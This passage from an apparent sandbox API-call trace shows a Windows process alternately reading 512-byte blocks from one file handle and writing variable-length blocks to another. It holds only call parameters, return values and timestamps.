lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.314] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.315] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.315] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.316] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.316] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.317] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.317] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.318] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.318] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.318] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.319] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.319] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.320] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.320] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.321] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.321] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.322] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.322] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.322] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.323] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x306, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.323] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.324] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.324] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.325] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.325] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.326] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.326] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.327] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.327] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.328] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.328] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.329] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.330] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.331] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.331] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.332] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.332] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.332] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.333] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.333] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x305, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.334] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.334] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.335] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.335] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.336] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.336] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.337] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.337] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.338] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.338] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.339] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.339] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.340] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.340] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.341] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.341] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.342] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.342] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x313, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.342] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.343] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.343] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.344] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x359, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.344] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.345] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.346] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.346] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.347] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.347] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.348] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.348] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.349] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.349] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.349] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.350] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.350] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.351] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.351] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.352] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.352] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.353] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.353] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.354] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.354] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.355] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.355] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.356] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.356] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.357] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.357] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.358] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.358] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.358] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.359] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.359] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.360] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.360] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.361] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.361] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.362] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: 